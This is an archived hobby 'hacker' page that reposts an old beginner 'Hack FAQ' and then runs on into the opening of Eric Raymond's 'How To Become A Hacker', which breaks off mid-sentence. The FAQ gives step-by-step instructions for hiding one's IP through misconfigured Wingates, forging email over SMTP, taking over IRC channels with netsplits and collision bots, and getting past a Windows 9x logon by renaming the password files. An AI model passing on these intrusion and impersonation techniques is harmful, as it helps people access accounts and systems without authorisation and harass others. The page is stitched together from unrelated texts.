hacker News
This site is for fun only i disclaim anything you may do as a fundelmental aguish this site is not i repeat not responisible for anything you do with this information it is only to be a steping stone for eduaction on computers |
|
February 2012 |
| S | M | T | W | T | F | S |
|---|
| | | | 1 | 2 | 3 | 4 | | 5 | 6 | 7 | 8 | 9 | 10 | 11 | | 12 | 13 | 14 | 15 | 16 | 17 | 18 | | 19 | 20 | 21 | 22 | 23 | 24 | 25 | | 26 | 27 | 28 | 29 | |
Members List:
CEO:
Sinosuke SanosukeLinks Section
| |
hacker guides all...
Hack FAQ < Volume 2 >credited to Wang
Frequently asked questions about hacking and computers
--------------------------------------------------------------------------------
Volume 2, If you have any topics you want covering, please fill in the online form at http://www.wangproducts.co.uk or email me at Wang@most-wanted.com and I will consider putting them into the next volume. ALSO! if you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously). To recieve an email each time a new Hack Faq volume is released, sign up to our mailing list at http://www.wangproducts.co.uk
--------------------------------------------------------------------------------
Topics Covered
What are Wingates?
Where do I find out the addresses of Wingates?
What are Proxys?
What are Firewalls?
How do I forge email?
What are Email headers?
What does the stuff in an Email header mean?
What is IRC?
How can I hack Ops on an IRC channel?
How can I change my Windows boot-up/turn-off screens?
How can I break into a windows 9x system?
--------------------------------------------------------------------------------
What are Wingates?
A wingate is a windows-based computer that can be used as a gateway to other computers. It is running the software 'Wingate'. The idea is that you would install it on a LAN (Local Area Network) and then it would allow the people on the LAN to connect to the internet under the wingate computers modem. However, if the person who setup the wingate is stupid (which most of them are) they will leave it improperly configured. This means that not just people who are on the LAN have access to it, everyone on the Internet has access!
Wingates are kind of like divertions that you can take when connecting to servers (Do I explain this well or what?). Here is an example (using Telnet):
If I want to connect to "Phreak.org" on port "25", I could simply load telnet up, tell it to connect - and Bingo I’m connected. But how anonymous is that? The chances are that when I connect to that server it logs my IP address along with the time I connected and the date. If I do anything bad, they can contact my Internet Service Provider and get me flung off.
So, what your probably saying is, "Ok, so is there anyway I can fake my IP address so that they cant find out who I am?". Well, that’s where the Wingates come in. Lets try connecting to Phreak.org again this time through a Wingate:
I load up telnet, and instead of connecting straight to phreak.org - I connect to the wingate, say, Wingate.com on port 23 (port 23 is the usual port Wingates operate on) and it gives me the prompt "Wingate>". I then type in "Phreak.org 25" and the wingate sends me to Phreak.org on port 25. The difference is - I am connecting under the wingates IP address, and not my own!
This isn't foolproof though, so don't go around thinking your untraceable - if someone really wanted to find out who you were, chances are they could. However, saying this, most Wingates have little no logging - which means that they dont keep tracks of who goes through them...so you might just get away with your haxor escapades.
I made a program which deals with the problem of Wingates going up and down, its called Server 2000 and its available from http://www.wangproducts.co.uk
--------------------------------------------------------------------------------
Where do I find out the addresses of Wingates?
Well, this is slightly more tricky because Wingates go up and down all the time. A wingate scanner is available from my website as part of the WangScript WarTools ( http://come.to/wangscript ) so you can download that. Basically that scans a range of IP address and tells you if it finds any wingates.
The second method (far easier) is to connect to some big IRC network (eg. eu.undernet.org or Irc.dal.net) and type the command "/stats k". This will give you a list of all the people banned from the server and their addresses. Chances are most of them have been banned for using Wingates! So, just copy down their addresses and then try telneting to them on port 23. If it responds "Wingate>" - you got one!
--------------------------------------------------------------------------------
What are proxies?
Proxy servers can handle HTTP, FTP and GOPHER. Each have their own ports. A proxy is made up of a server-name and what port it is on.
Example: proxy.foobar.net:80.
Server address/name: proxy.foobar.net
Port: 80
Say you want to be a bit more anonymous by hiding your IP, one solution would be to use a proxy. If someone tracked the proxy it would give them the location of that server, and not you! So I suppose you could say a proxy achieves the same thing as a wingate. You can use proxies with Netscape, Internet Explorer, and mIRC to anonomize your online time.
--------------------------------------------------------------------------------
What are firewalls?
A firewall is a system (or group of systems) that controls access between two networks. They can exist to block incoming traffic / to permit incoming traffic.
--------------------------------------------------------------------------------
How do I forge email?
Telnet to a mail server on port 25 (usually you can just get an ISP, e.g. BTInternet and then add mail.btinternet.com). Now, different servers will run different mailing programs - that is expected...but when you connect to a mail server the most likely mail program you are likely to encounter is SendMail (a program which is known for glitches and flaws). How do you know if its SendMail? When you telnet to the mail server it might mention 'Sendmail' or there may be some numbers like '8.8.3/8.6.9' that is a pretty good sign that it is running sendmail. Once connected to the mail server, if it is sendmail - type in the following (may be different on some versions):
Helo
Mail from:
Rcpt to:
Data
. (just a single dot)
If it isn't SendMail then the syntax will be slightly different, but along the same lines. Here is an example of what you might type:
helo aol.com
mailfrom: youaredodgy@hacker.com
rcpt to: billclinton@whitehouse.gov
data
I know what your up to you dirty old man
.
So is that completely untraceable? Well, No. The average internet user will wet their pants if you forge an email to them from their own address with the message "I will become you!"...and they wont have a clue how to trace it. But anyone with any skill will know exactly how to find out where it came from. They can do this by reading the email headers. Headers are the extra bits that come with an email that you can't by default see (although there will be an option in your email program to switch "Show All Headers" on or "View Source of Email"). The thing is, when you send an email your IP address gets attatched to it (Damn that IP address thing again!). Send a fake mail to yourself and see if you can find your email address in the headers.
--------------------------------------------------------------------------------
What are Email headers?
Headers are the extra bits that come with an email that you can't by default see (although there will be an option in your email program to switch "Show All Headers" on or "View Source of Email"). Here is an example of an email (all the real server names has been removed and replaced by Fakes):
Return-Path:
Received: from fubar.org ([57.11.151.287]) by mta2-svc.dodgy.net
(InterMail v4.01.01.02 201-229-111-106) with SMTP
id <19990730093810.ECQX20505.mta2-svc@fubar.org>
for ; Fri, 30 Jul 1999 10:38:10 +0100
Received: med fubar.org via smail vid stdio
Date: Fri, 30 Jul 1999 04:42:37 -0500 (CDT)
From: Wang
To: Git@dodgy.net
Subject: Wang is here
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Mozilla-Status: 8001
--------------------------------------------------------------------------------
What does the stuff in an Email header mean?
Right, now the analysis of what that garbage means! First, why would you want to know what the headers mean? Heres a few reasons why you NEED to know:
1> It will give you loads of computer names that you can explore and yes!, even hack.
2> Ever had some spam mail sent to you with loads of adverts, or wondered who email bombed you? The first step to earning how to spot email forgeries and spot the culprit is to be able to read headers.
3> Learn how you can forge email and avoid getting found out.
4> Find out the weaknesses of your enemies computer by reading their headers.
Heres that email example again:
Return-Path:
Received: from fubar.org ([57.11.151.287]) by mta2-svc.dodgy.net
(InterMail v4.01.01.02 201-229-111-106) with SMTP
id <19990730093810.ECQX20505.mta2-svc@fubar.org>
for ; Fri, 30 Jul 1999 10:38:10 +0100
Received: med fubar.org via smail vid stdio
Date: Fri, 30 Jul 1999 04:42:37 -0500 (CDT)
From: Wang
To: Git@dodgy.net
Subject: Wang is here
Message-Id:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Lets go through that previous email one section at a time:
Return-Path:
This is the address that will be used if you choose to click 'reply' in your email program.
Received: from fubar.org ([57.11.151.287]) by mta2-svc.dodgy.net
(InterMail v4.01.01.02 201-229-111-106) with SMTP
id <19990730093810.ECQX20505.mta2-svc@fubar.org>
for ; Fri, 30 Jul 1999 10:38:10 +0100
This tells us that fubar.org (with the IP address 57.11.151.287) passed this mail onto the computer named mta2-svc.dodgy.net which was running the InterMail email program. SMTP stands for 'simple mail transfer protocol' by the way. Then we can see that this email was sent to Git@dodgy.net, and then it has the date and time information. So basically this part of the header names the computers involved in the mail transfer process, the programs involved and the target address.
Received: med fubar.org via smail vid stdio
ok, so this header isn't exactly an everyday one, I am not sure exactly what this part means, but I take it it just tells us that the email was received
from fubar.org, and the second part is the program that handled it. Smail could be SendMail, you could test that by connecting to the server on port 25 and seeing what it greets you with.
Date: Fri, 30 Jul 1999 04:42:37 -0500 (CDT)
From: Wang
To: Git@dodgy.net
Subject: Wang is here
These few lines are self explanatory.
Message-Id:
The first part of this message ID says 'Pine'. Pine is an email program for Unix type systems (stands for 'Pine is not Elm'). So we could gather that the person who sent this message was using a unix type system or a shell account loaded with Pine (and he was as well, because I sent this message from my shell account!). The second part of the ID is 19990730 - the date (30/07/99). The next part is the time, 0442 - 04:42. The 13156 is the number identifying who wrote the email.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Mime (Multipurpose Internet Mail Extensions)is a protocol to view email.
The character set "us-ascii" tells us what character set this email will use. Some email uses ISO ascii instead, generally if it originates outside the US.
Well, we just analysed that header - I know thats a lot to take in, but try it! When you get an email, check out the headers and use the guide above as a guide. Headers vary LOADS, so dont expect to see exactly what was in my header. However, most of it will be the same, try getting some server names and then telneting to them on ports 25 or 110 (SMTP and POP ports).
Hacker Hacker covered this topic really well in GTMHH volume 3, so if you want more info, download that.
--------------------------------------------------------------------------------
What is IRC?
IRC always you to connect to millions of chat servers around the world. Every server has a number of rooms (some of them over 1000) dealing with different topics (yes, you guessed it...hacking is quite a big topic there!) Most people will advise you not to go into rooms such as #Hack, #Hacking, #Phreaking, #Crackers etc. and say "I want to know how to hack, teach me!"...and I agree with them! If you do this, the chances are all the hackers will laugh at you and probably nuke you (Nuking involves them using a program to either disconnect you from the chat server, or even crash your computer. These are known as DOS attacks - Denial Of Service)
Now your probably thinking - why tell us to get on IRC then? Well, if you want to learn about programing - this is a good place to get answers. When I was learning the language Pascal and I got stuck on a few things, I went on IRC and asked some people to help me with them.
The best IRC client for windows is mIRC. mIRC is quite a neat little program which has its own programing language built in to let you customize it and create your own commands (hacking central or what). When you program in mIRC your programs are called Scripts. There are millions of websites dedicated to distributing these scripts, and there are many different types (Utility scripts, Friendly scripts, War script etc.)
You can get mIRC at: www.mirc.com
You can get Scripts from: www.mircx.com / www.mirc.net / www.xcalibre.com
If you use Unix or linux or something similar, then your best client is probably BitchX (be afraid, be very afraid). This is available from:
www.bitchx.com
Ok, now the programming knowledge bit. This is difficult because it really is impossible to write a text file which you can read and then say, right I can program in X now. What you can do though, is read a text file and get a basic idea of how the language works - and then experiment yourself (also try downloading some source codes)
--------------------------------------------------------------------------------
How can I hack Ops on an IRC channel?
Well, you want the moon on a stick don't you? Oh well, here’s what you will need:
An IRC client, whether it be mIRC or BitchX (Not Globalchat !! urghh!)
A nice script with quick access to Op commands/Chanserv/Nickserv
A LinkLooker
A MCB
Let’s take a large IRC network, "Irc.Dal.net". Dalnet consist of around 20 servers all around the world so that people can connect to the servers near them and get faster speeds/less lag. Sometimes, a particular IRC server will split from the rest of the network and be 'marooned' on its own for a while. It will then rejoin the rest of the network and everything will go back to normal. There is however, a good exploit of IRC that can happen when these Splits occur.
When a split occurs, if you quickly connect to the server that has split and join a normally thriving channel (such as #mIRC, #Hackers etc.) you will (usually) find that the room is empty, and you have Ops!! (An @ by your name). When the server then rejoins the rest of the network you will find that you join the 'Real' channel with all the people in - but you still have Ops! This is how most hacks of Channel Ops work. So now your probably saying "So how do I know when a server splits??".
A Link looker is a tool that will detect a server split. You give it a nickname and some details (including the server to connect to) and it will connect and sit there monitoring the network activity. If a server splits - you will see some text appear warning you of a split. This is when you would normally rush off to join that server/join the room to hack. When you are on a large server like Dalnet, because it has lots of child servers it is more likely to experience a split. However, if you load up a link looker don't suspect to see splits instantly, you may have to wait quite a while!
So, what happens when your split server rejoins the network and you have Ops in the channel? Well, the experienced will tell you - they quickly deop you to make sure you don't attempt a takeover. They may even have a bot in the room to make sure that no unauthorised nicknames get ops.
MCB (Multi Collide Bot) is a great program that creates a clone of a nick you want to kill (almost always an op on the channel you are trying to hack) on a server that has split (yes the one Link Looker informed you of). Basically you feed MCB the name or names of the nick you want to kill and tell it what split server to establish those clones and upon rejoin - BAM/SMACK/KIILL!! Yes that’s right, the target is thrown out of the channel (losing ops) and must re-establish a connection with a server to get back onto IRC and into the channel. So yes, you have figured it out. If you kill all of the ops on a channel and you ride in on a split you will be the only op in the channel.
You can get these programs and more from the WangScript website ( http://come.to/wangscript ), just download the WarTools addon.
--------------------------------------------------------------------------------
How can I change my Windows boot-up/turn off screens?
Don' you hate that Windows boot-up graphic? Oh! And what about that 'It is now safe to turn off your computer' screen! If you want to show your friends that you’re really serious about hacking, lets think about changing those screens. After all, your friends will probably worship you after you change your 'it is now safe...' screen into a 'It is NEVER safe to turn off your computer' screen. Microsoft has tried to hide these screens from you by making them have different extensions (e.g. a picture would usually have an extension of .jpg, .gif, or .bmp). Here is where to find them:
Bootup graphic is hidden in either a file named c:logo.sys and/or ip.sys. To see this file, open File Manager, click "view", then click "by file type," then check the box for "show hidden/system files." Then, back on "view," click "all file details." To the right of the file logo.sys you will see the letters "rhs." These mean this file is "read-only, hidden, system."
The 'It is now safe', and 'Windows is now shutting down...' screens are in the c:windowssystem directory, I think they are also hidden - so just switch on "show all files". They are called 'Logos.sys' and 'Logow.sys'.
Now, get hold of an image editing program (you could use MSPaint that comes with Windows, or get hold of a better one like Paint Shop Pro).
Load up one of the files (I would start with logos.sys or logow.sys), and alter it to your desire, be sure not to alter the size of the picture or the number of colours it uses etc. (It is quite precise about what it should be, if you muck it up then the graphic will not be shown at all! hint: keep a spare copy!)
Now the trouble with using one of the existing logo files is that they only allow you to use their original colours. If you really want to go alter it well, start a fresh image but make sure the width is 320 and height is 400. Now you are free to use any colour combination available in this program. Remember to save the file as c:logo.sys for your start-up logo, or c:windowslogow.sys and or c:windowslogos.sys for your shutdown screens.
Now, say you need to get rid of the image you have changed it to, or you have someone who wants to sue your computer - and you don't want them to see what you've done. Here's what you can do to get your start-up logo back. Just change the name of c:logo.sys to something else. Something like logo.bak.
Microsoft programmed Windows to recognise that their is no screen, and to therefore put the normal one back on (a hidden copy that windows has)!
--------------------------------------------------------------------------------
How can I break into a windows 9x system?
Right, you load up a windows9x computer and your greeted with a LOGON dialog screen - what do you do??? Here are the things you can try:
1> Try pressing (yes, its true) CANCEL, christ! sometimes that actually works! How much security do you think windows has now??
2> Load up the computer and press whatever F key you press to get into the Boot menu (on my comp I press F8, but on some it may be different - like F5 or something). Choose to go to MSDOS or similar, so you can access DOS. When you get the DOS prompt type:
rename c:windows*.pwl c:windows*.zzz
This renames the *.pwl files (the one that stored the password) to something so that Windows can't find it. Now when you get to that damn Logon screen, just type anything as the password and you'll get in! When you want to put it back to normal, just go back to dos and type:
rename c:windows*.zzz c:windows*.pwl
3> Ok, what if you cant access the boot keys because someone has disabled them? Turn off the computer, insert a boot disk. When the computer loads up (if it boots from A: drive then C:) it should read the boot disk and drop you into DOS. Now you can use the above technique to gain access.
4> Right, what if they have been clever and disabled their boot keys AND made sure that it doesn't boot from a: ? Well, this is a little extreme...but:
Get a screwdriver, solder sucker and soldering iron. Open up your the computers casing. Remove the battery, then plug the battery back in. Your computer now hopefully has the CMOS default settings. Go into the CMOS and set it to first check the A: drive when booting up. There may be an alternative to taking the battery out: many motherboards have a 3 pin jumper to reset the CMOS to its default settings. Look for a jumper close to the battery or look at your manual if you have one.
font color=blue>--------------------------------------------------------------------------------
Conclusion
Some useful stuff there to kick start your Hacking career. Most of the stuff there is for newbies, so if you are already an amazing hacker - please don't bother reading these guides as they will only go over stuff you probably already know! If there is anything I haven't covered and you would like me to consider putting into my next text file OR you have any alternative answers to what I have given, please fill in the online form at http://www.wangproducts.co.uk or email me at: Wang@most-wanted.com
Wang
http://welcome.to/wangsdomain
http://www.wangproducts.co.uk
18 August 1
______________________________________________________________________How To Become A Hacker Eric Steven Raymond Thyrsus Enterprises Copyright © 2001 Eric S. Raymond Revision History Revision 1.25 2 Jun 2004 esr New translations. Revision 1.24 20 Jan 2004 esr Belatedly take notice, in the first paragraph, that this document has become authoritative for a lot of people. -------------------------------------------------------------------------------- Table of Contents Why This Document? What Is a Hacker? The Hacker Attitude 1. The world is full of fascinating problems waiting to be solved. 2. No problem should ever have to be solved twice. 3. Boredom and drudgery are evil. 4. Freedom is good. 5. Attitude is no substitute for competence. Basic Hacking Skills 1. Learn how to program. 2. Get one of the open-source Unixes and learn to use and run it. 3. Learn how to use the World Wide Web and write HTML. 4. If you don't have functional English, learn it. Status in the Hacker Culture 1. Write open-source software 2. Help test and debug open-source software 3. Publish useful information 4. Help keep the infrastructure working 5. Serve the hacker culture itself The Hacker/Nerd Connection Points For Style Other Resources Frequently Asked Questions Why This Document? As editor of the Jargon File and author of a few other well-known documents of similar nature, I often get email requests from enthusiastic network newbies asking (in effect) "how can I learn to be a wizardly hacker?". Back in 1996 I noticed that there didn't seem to be any other FAQs or web documents that addressed this vital question, so I started this one. A lot of people now consider it definitive, and I suppose that means it is. Still, I don't claim to be the exclusive authority on this topic; if you don't like what you read here, write your own. If you are reading a snapshot of this document offline, the current version lives at http://catb.org/~esr/faqs/hacker-howto.html. Note: there is a list of Frequently Asked Questions at the end of this document. Please read these—twice—before mailing me any questions about this document. Numerous translations of this document are available: Bulgarian, Catalan, Chinese (Simplified), Danish, Dutch, Finnish Finnish, German, Hebrew, Hungarian, Italian Japanese, Korean, Polish, Portuguese (European), Spanish, Turkish, and Swedish. Note that since this document changes occasionally, they may be out of date to varying degrees. The five-dots-in-nine-squares diagram that decorates this document is called a glider. It is a simple pattern with some surprising properties in a mathematical simulation called Life that has fascinated hackers for many years. I think it makes a good visual emblem for what hackers are like — abstract, at first a bit mysterious-seeming, but a gateway to a whole world with an intricate logic of its own. Read more about the glider emblem here. What Is a Hacker? The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant. There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker. The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’. There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end. The basic difference is this: hackers build things, crackers break them. If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers. The Hacker Attitude 1. The world is full of fascinating problems waiting to be solved. 2. No problem should ever have to be solved twice. 3. Boredom and drudgery are evil. 4. Freedom is good. 5. Attitude is no substitute for competence. Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude. But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well. Or, as the following modern Zen poem has it: To follow the path: look to the master, follow the master, walk with the master, see through the master, become the master. So, if you want to be a hacker, repeat the following things until you believe them: 1. The world is full of fascinating problems waiting to be solved. Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval. (You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.) 2. No problem should ever have to be solved twice. Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there. To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones. (You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.) 3. Boredom and drudgery are evil. Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil. To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers). (There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.) 4. Freedom is good. Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers. (This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.) Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation' that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief. 5. Attitude is no substitute for competence. To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work. Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is good. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best. If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker. Basic Hacking Skills 1. Learn how to program. 2. Get one of the open-source Unixes and learn to use and run it. 3. Learn how to use the World Wide Web and write HTML. 4. If you don't have functional English, learn it. The hacker attitude is vital, but skills are even more vital. Attitude is no substitute for competence, and there's a certain basic toolkit of skills which you have to have before any hacker will dream of calling you one. This toolkit changes slowly over time as technology creates new skills and makes old ones obsolete. For example, it used to include programming in machine language, and didn't until recently involve HTML. But right now it pretty clearly includes the following: 1. Learn how to program. This, of course, is the fundamental hacking skill. If you don't know any computer languages, I recommend starting with Python. It is cleanly designed, well documented, and relatively kind to beginners. Despite being a good first language, it is not just a toy; it is very powerful and flexible and well suited for large projects. I have written a more detailed evaluation of Python. Good tutorials are available at the Python web site. Java is also a good language for learning to program in. It is more difficult than Python, but produces faster code than Python. I think it makes an excellent second language. But be aware that you won't reach the skill level of a hacker or even merely a programmer if you only know one or two languages — you need to learn how to think about programming problems in a general way, independent of any one language. To be a real hacker, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages. If you get into serious programming, you will have to learn C, the core language of Unix. C++ is very closely related to C; if you know one, learning the other will not be difficult. Neither language is a good one to try learning as your first, however. And, actually, the more you can avoid programming in C the more productive you will be. C is very efficient, and very sparing of your machine's resources. Unfortunately, C gets that efficiency by requiring you to do a lot of low-level management of resources (like memory) by hand. All that low-level code is complex and bug-prone, and will soak up huge amounts of your time on debugging. With today's machines as powerful as they are, this is usually a bad tradeoff — it's smarter to use a language that uses the machine's time less efficiently, but your time much more efficiently. Thus, Python. Other languages of particular importance to hackers include Perl and LISP. Perl is worth learning for practical reasons; it's very widely used for active web pages and system administration, so that even if you never write Perl you should learn to read it. Many people use Perl in the way I suggest you should use Python, to avoid C programming on jobs that don't require C's machine efficiency. You will need to be able to understand their code. LISP is worth learning for a different reason — the profound enlightenment experience you will have when you finally get it. That experience will make you a better programmer for the rest of your days, even if you never actually use LISP itself a lot. (You can get some beginning experience with LISP fairly easily by writing and modifying editing modes for the Emacs text editor.) It's best, actually, to learn all five of these (Python, Java, C/C++, Perl, and LISP). Besides being the most important hacking languages, they represent very different approaches to programming, and each will educate you in valuable ways. I can't give complete instructions on how to learn to program here — it's a complex skill. But I can tell you that books and courses won't do it (many, maybe most of the best hackers are self-taught). You can learn language features — bits of knowledge — from books, but the mind-set that makes that knowledge into living skill can be learned only by practice and apprenticeship. What will do it is (a) reading code and (b) writing code. Learning to program is like learning to write good natural language. The best way to do it is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more ... and repeat until your writing begins to develop the kind of strength and economy you see in your models. Finding good code to read used to be hard, because there were few large programs available in source for fledgeling hackers to read and tinker with. This has changed dramatically; open-source software, programming tools, and operating systems (all built by hackers) are now widely available. Which brings me neatly to our next topic... 2. Get one of the open-source Unixes and learn to use and run it. I'm assuming you have a personal computer or can get access to one (these kids today have it so easy :-)). The single most important step any newbie can take toward acquiring hacker skills is to get a copy of Linux or one of the BSD-Unixes, install it on a personal machine, and run it. Yes, there are other operating systems in the world besides Unix. But they're distributed in binary — you can't read the code, and you can't modify it. Trying to learn to hack on a Microsoft Windows machine or under MacOS or any other closed-source system is like trying to learn to dance while wearing a body cast. Under OS/X it's possible, but only part of the system is open source — you're likely to hit a lot of walls, and you have to be careful not to develop the bad habit of depending on Apple's proprietary code. If you concentrate on the Unix under the hood you can learn some useful things. Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. (This wasn't always true, and some old-time hackers still aren't happy about it, but the symbiosis between Unix and the Internet has become strong enough that even Microsoft's muscle doesn't seem able to seriously dent it.) So, bring up a Unix — I like Linux myself but there are other ways (and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code. You'll get better programming tools (including C, LISP, Python, and Perl) than any Microsoft operating system can dream of hosting, you'll have fun, and you'll soak up more knowledge than you realize you're learning until you look back on it as a master hacker. For more about learning Unix, see The Loginataka. You might also want to have a look at The Art Of Unix Programming. To get your hands on a Linux, see the Linux Online! site; you can download from there or (better idea) find a local Linux user group to help you with installation. From a new user's point of view, all Linux distributions are pretty much equivalent. You can find BSD Unix help and resources at www.bsd.org. I have written a primer on the basics of Unix and the Internet. (Note: I don't really recommend installing either Linux or BSD as a solo project if you're a newbie. For Linux, find a local Linux user's group and ask for help.) 3. Learn how to use the World Wide Web and write HTML. Most of the things the hacker culture has built do their work out of sight, helping run factories and offices and universities without any obvious impact on how non-hackers live. The Web is the one big exception, the huge shiny hacker toy that even politicians admit is changing the world. For this reason alone (and a lot of other good ones as well) you need to learn how to work the Web. This doesn't just mean learning how to drive a browser (anyone can do that), but learning how to write HTML, the Web's markup language. If you don't know how to program, writing HTML will teach you some mental habits that will help you learn. So build a home page. Try to stick to XHTML, which is a cleaner language than classic HTML. (There are good beginner tutorials on the Web; here's one.) But just having a home page isn't anywhere near good enough to make you a hacker. The Web is full of home pages. Most of them are pointless, zero-content sludge — very snazzy-looking sludge, mind you, but sludge all the same (for more on this see The HTML Hell Page). To be worthwhile, your page must have content — it must be interesting and/or useful to other hackers. And that brings us to the next topic... 4. If you don't have functional English, learn it. As an American and native English-speaker myself, I have previously been reluctant to suggest this, lest it be taken as a sort of cultural imperialism. But several native speakers of other languages have urged me to point out that English is the working language of the hacker culture and the Internet, and that you will need to know it to function in the hacker community. This is very true. Back around 1991 I learned that many hackers who have English as a second language use it in technical discussions even when they share a birth tongue; it was reported to me at the time that English has a richer technical vocabulary than any other language and is therefore simply a better tool for the job. For similar reasons, translations of technical books written in English are often unsatisfactory (when they get done at all). Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following. Status in the Hacker Culture 1. Write open-source software 2. Help test and debug open-source software 3. Publish useful information 4. Help keep the infrastructure working 5. Serve the hacker culture itself Like most cultures without a money economy, hackerdom runs on reputation. You're trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge. Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren't really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (now gradually decaying but still potent) against admitting that ego or external validation are involved in one's motivation at all. Specifically, hackerdom is what anthropologists call a gift culture. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill. There are basically five kinds of things you can do to be respected by hackers: 1. Write open-source software The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use. (We used to call these works “free software”, but this confused too many people who weren't sure exactly what “free” was supposed to mean. Most of us, by at least a 2:1 ratio according to web content analysis, now prefer the term “open-source” software). Hackerdom's most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them. 2. Help test and debug open-source software They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That's why any open-source author who's thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that's a protracted, exhausting nightmare and one that's merely a salutary nuisance. If you're a newbie, try to find a program under development that you're interested in and be a good beta-tester. There's a natural progression from helping test programs to helping debug them to helping modify them. You'll learn a lot this way, and generate good karma with people who will help you later on. 3. Publish useful information Another good 